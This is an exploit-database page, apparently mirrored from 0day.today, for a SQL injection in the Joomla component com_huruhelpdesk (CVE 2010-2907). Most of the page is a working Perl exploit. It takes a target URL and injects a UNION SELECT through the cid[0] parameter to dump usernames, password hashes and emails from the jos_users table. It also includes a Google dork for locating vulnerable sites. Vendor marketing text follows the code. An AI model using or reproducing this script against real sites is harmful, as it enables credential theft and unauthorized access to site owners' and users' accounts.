Lucene search
K

Joomla Component com_huruhelpdesk Remote SQL Injection Vulnerability

🗓️ 04 Oct 2012 00:00:00Reported by D35m0nd142Type 
zdt
 zdt
🔗 0day.today👁 35 Views

Joomla com_huruhelpdesk Remote SQL Injection Vulnerabilit

Code
#Exploit Title: Joomla Component com_huruhelpdesk Remote SQL Injection	
#Google Dork: "inurl:option=com_huruhelpdesk"
#Date: 04/10/2012
#Exploit Author: D35m0nd142
#Vendor Homepage: http://www.huruhelpdesk.net/
#Tested on Joomla 1.5 
#CVE: 2010-2907


#!/usr/bin/perl
system("clear");
print "***************************************\n";
print " Joomla Component com_huruhelpdesk    *\n";
print "      SQL Injection exploit           *\n";
print "      Created by D35m0nd142           *\n";
print "***************************************\n\n";
use LWP::UserAgent;
print "Target page [ex: http://www.site.com/dir] --> ";
chomp(my $target=<STDIN> );
$column_name="concat(username,0x3a,password,0x3a,mail)";
$table_name="jos_users";
$prm="-1/**/union/**/select/**/";
$start= LWP::UserAgent->new() or die "[!] Error while processing";
$start->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');
$website= $target . "/index.php?option=com_huruhelpdesk&view=detail&cid[0]=".$prm."1,2,3,".$column_name.",5,6,7+from+jos_users--";
$ok= $start->request(HTTP::Request->new(GET=>$website));
$ok1= $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){
print "[+] Password found --> $1\n\n";
sleep 1;
}
else
{
print "No password found :(\n";
}



#  0day.today [2018-03-01]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation